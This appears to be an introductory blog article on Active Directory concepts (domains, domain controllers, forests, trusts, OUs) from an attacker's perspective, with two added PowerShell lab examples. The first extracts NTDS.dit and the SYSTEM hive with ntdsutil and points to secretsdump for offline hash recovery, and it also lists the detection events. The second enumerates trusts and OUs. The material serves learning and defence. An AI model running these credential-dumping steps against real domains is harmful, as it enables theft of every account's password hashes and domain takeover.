Most organizations today rely on Active Directory for centralized identity, resource management and policy enforcement. Attacks on these environments are increasing, and attackers keep finding new ways to compromise them. Many certifications (including OSCP and PNPT) now require taking over an Active Directory domain to pass the exam. So, in this series of articles, we will discuss Active Directory hacking: we will cover the basics first and then walk through the attacks in a simulated environment.
These posts focus on understanding Windows Active Directory and seeing it from the attacker's perspective. Administrators implement security policies, but misconfigurations often let attackers turn those very features against the environment.
Active Directory
Active Directory is a Microsoft directory service that acts as a centralized repository for all data about the objects in a network, which makes them easier to manage. These objects include users, computers, servers, groups and other resources. Although it has many functions, its primary one is to authenticate users and machines in a domain environment and to authorize their access to resources. Objects and resources are managed remotely, so AD provides a single management interface that is reachable from anywhere in the network.
Although it is a Windows feature, other operating systems (for example Linux hosts) can also be joined to an AD domain.

Why Active Directory?
It is the most widely used identity management service in the world; a commonly cited figure is that around 95% of Fortune 1000 companies run it. From an attacker's point of view, compromising AD rarely depends on a software vulnerability that a patch would fix. Instead, we abuse legitimate features, trusts, misconfigurations and components, which is why AD attacks keep working against fully patched environments.
Active Directory Domain
A domain is a logical grouping of Active Directory objects (users, computers, groups, etc.) that share a common AD database. A domain is referred to by its unique DNS-style name and follows the normal domain name structure.
An AD infrastructure can be split into separate domains to create smaller administrative boundaries, so that administration can be segregated per domain. Each domain can have its own policies, which apply only to the objects of that domain.
The following are some important components of a domain:
- Objects
- Authentication Service
- Group Policies
- DNS
- DHCP
Physical AD Components
We will talk about two very important physical AD components.
Domain Controller
A DC is a server running the Active Directory Domain Services (AD DS) role. It is the authority for the domain and provides the following:
- Hosting a writable copy of the AD DS directory store holding all information about the domain's objects
- Providing authentication and authorization services, primarily through Kerberos (with NTLM still available as a fallback)
- Replicating updates to the other domain controllers in the domain and, for the forest-wide partitions, across the forest (including parent-child domains)
- Allowing administrative access to manage user accounts and network resources
In a red team engagement, one of the aims is to gain control of a DC, because it has ultimate power over the domain; from there, compromise of the whole network typically follows.
Data Store
The AD DS data store contains the database files and processes that store and manage directory information for users, services, and applications.
As an attacker, once we have access to a DC, the target is the NTDS.dit file from the data store. Its default location is %SystemRoot%\NTDS on every domain controller. The file is held open by the directory service, so it cannot simply be copied, and the password hashes inside it are encrypted with a key derived from the SYSTEM registry hive, so that hive has to be taken along with it. This file is extremely sensitive because it contains everything stored in the AD database:
- Users
- Objects
- Groups
- Password hashes for all users
We can then crack these hashes offline, use them for pass-the-hash, or, with the krbtgt account's hash, forge a golden ticket.
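As an added example (not part of the original post), the following PowerShell run locally on a lab domain controller with Domain Admin rights uses ntdsutil's Install-From-Media mode to take a consistent copy of NTDS.dit together with the SYSTEM hive, lists what was produced, and then checks the Application log for the ESENT events that defenders commonly use to spot exactly this activity. The output folder C:\ifm is an assumption.

```powershell
# Added example, not from the original post. Run on a DC you own, as Domain Admin.
# Output directory is an assumption; any local path works.
$OutDir = 'C:\ifm'

# NTDS.dit is held open by the directory service, so Copy-Item fails with a
# sharing violation. ntdsutil's "ifm" (Install From Media) mode uses the Volume
# Shadow Copy service to write a consistent copy of the database plus the
# registry hives needed to decrypt it. Each quoted string is one ntdsutil command.
& ntdsutil.exe "activate instance ntds" "ifm" "create full $OutDir" quit quit

# What has to leave the box together:
#   <OutDir>\Active Directory\ntds.dit  - the database (users, groups, computers, secrets)
#   <OutDir>\registry\SYSTEM            - holds the boot key protecting the password
#                                         encryption key; without it the hashes in
#                                         ntds.dit cannot be decrypted
Get-ChildItem -Path $OutDir -Recurse -File | Select-Object FullName, Length

# Defender's view of the same action: the IFM snapshot creates and detaches a
# database copy, which the ESENT provider records in the Application log as
# Event ID 325 (database created) and 327 (database detached). Showing them
# here so the lab demonstrates both the attack and its footprint.
Get-WinEvent -FilterHashtable @{ LogName = 'Application'; ProviderName = 'ESENT'; Id = 325, 327 } -MaxEvents 5 |
    Select-Object TimeCreated, Id, Message
```

Offline, the pair of files is processed with a tool such as Impacket's secretsdump (`secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL`) to recover the NT hashes and Kerberos keys for every account, including krbtgt. Note that the IFM route is noisy: besides the ESENT events, process-creation auditing (Security 4688 with command-line logging) captures the full ntdsutil command line.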
Logical AD Components
Schema
The schema is the blueprint that defines every kind of object that can be created in AD. It consists of class definitions (classSchema objects) that say which object classes exist, and attribute definitions (attributeSchema objects) that say which attributes an object of a given class may hold. In short, the schema enforces the rules for what the directory may contain.
Domain
The domain is used to group and manage objects in an organization. An organization with a single domain still has a tree and a forest: that one domain is the root of both. A domain acts as:
- An administrative boundary for applying policies to groups of objects
- A replication boundary for replicating data between domain controllers
- An authentication and authorization boundary that provides a way to limit the scope of access to resources
Trees
A tree is a group of domains in a hierarchy: when child domains are created under a parent domain, the result is a tree.
All domains in a tree:
- Share a contiguous namespace with the parent domain
- Can have additional child domains
- Are linked to their parent by a two-way transitive trust that is created automatically

Forests
A forest is a collection of one or more trees that share a common schema and configuration and are linked by two-way transitive trusts between their tree-root domains. The first domain created becomes the forest root domain.
The following are the characteristics of the forests:
- Share a common schema
- Share a common global catalog to enable searching
- Have automatic two-way transitive trusts between all domains in the forest
- Share a common configuration partition
- Share the Enterprise Admins and Schema Admins groups

Organizational Units
OUs are AD containers that contain users, groups, computers, and other OUs.
The following are the uses of OUs:
- Represent your organization hierarchically and logically
- Manage a collection of objects in a consistent way
- Delegate permissions to administer groups of objects
- Apply policies
Trusts
Trusts provide a mechanism for principals in one domain to access resources in another domain. Two properties describe a trust: its direction and its transitivity.
Direction: in a one-way trust, the trusting domain allows principals from the trusted domain to access its resources, but not the reverse; a two-way trust is simply two one-way trusts. Transitivity: a transitive trust extends to every domain that the trusted domain itself trusts, whereas a non-transitive trust stops at the two domains involved. Parent-child and tree-root trusts inside a forest are two-way and transitive by default; external and forest trusts are created by administrators and deserve the closest scrutiny.
Objects
Objects are the individual entries in the directory: a user, group, computer, shared folder, printer, etc. They live inside OUs or in the built-in containers (such as Users and Computers).
Summarizing the logical component
Domains group and manage the objects in an organization. A parent domain with one or more child domains forms a tree, and one or more trees form a forest. Across these domains and trees, trusts (one-way or two-way, transitive or non-transitive) define which principals can access which resources.
Inside the domains are the OUs (Organizational Units), and the OUs contain the objects.
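To see these logical components on a real domain, the following PowerShell is an added example (not from the original post) that maps the current domain, its forest and trees, the trust relationships and the OUs from any domain-joined machine. It uses only the .NET System.DirectoryServices classes that ship with Windows, so it needs neither the RSAT ActiveDirectory module nor elevated rights; a plain domain user can run it.

```powershell
# Added example, not part of the original post. Run as any domain user on a domain-joined host.
Add-Type -AssemblyName System.DirectoryServices

$domain = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
$forest = [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()

# Domain: name, parent (only child domains have one) and the DCs holding the writable copy
$parent = if ($domain.Parent) { $domain.Parent.Name } else { '<tree root>' }
"[*] Domain : {0} (parent: {1})" -f $domain.Name, $parent
"[*] DCs    : {0}" -f (($domain.DomainControllers | ForEach-Object Name) -join ', ')

# Forest: shared schema/configuration, a root domain, and the global catalog servers
"[*] Forest : {0} (root domain: {1}, functional level: {2})" -f $forest.Name, $forest.RootDomain.Name, $forest.ForestMode
"[*] Domains in forest: {0}" -f (($forest.Domains | ForEach-Object Name) -join ', ')
"[*] Global catalogs  : {0}" -f (($forest.GlobalCatalogs | ForEach-Object Name) -join ', ')

# Trees: walk each domain up to the domain with no parent; that is its tree root
$forest.Domains | ForEach-Object {
    $d = $_; $root = $d
    while ($root.Parent) { $root = $root.Parent }
    [pscustomobject]@{ Domain = $d.Name; TreeRoot = $root.Name; IsChildDomain = [bool]$d.Parent }
} | Format-Table -AutoSize

# Trusts, seen from the domain we queried ($domain is the "source"):
#   Inbound       = the other domain is trusted by us (its principals can reach our resources)
#   Outbound      = we are trusted by the other domain (our principals can reach its resources)
#   Bidirectional = two-way
# TrustType ParentChild and TreeRoot are the automatic transitive intra-forest trusts;
# External and Forest trusts were created by an administrator and widen the attack surface.
$domain.GetAllTrustRelationships() |
    Select-Object SourceName, TargetName, TrustDirection, TrustType |
    Format-Table -AutoSize

# OUs: where delegation and Group Policy links live. ADSI search rooted at the current domain.
$searcher = [adsisearcher]'(objectClass=organizationalUnit)'
$searcher.PageSize = 1000
$searcher.PropertiesToLoad.AddRange([string[]]@('distinguishedName', 'gPLink'))
$searcher.FindAll() | ForEach-Object {
    $p = $_.Properties
    # gPLink is a string of "[LDAP://cn={guid},...;flags]" entries; count the entries
    $gplink = [string]$p['gplink'][0]
    [pscustomobject]@{
        OU         = [string]$p['distinguishedname'][0]
        LinkedGPOs = @($gplink -split '\]\[' | Where-Object { $_ }).Count
    }
} | Sort-Object OU | Format-Table -AutoSize
```

The trust table is the part worth reading twice during an engagement: the TrustDirection value is relative to the domain you queried, so an Inbound trust means that domain will accept the other side's principals, which is the direction an attacker sitting in the other domain wants.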
Coming Up
Now that we have an understanding of AD and its components, the next article will focus on building a lab environment where we implement the domains and then eventually attack them.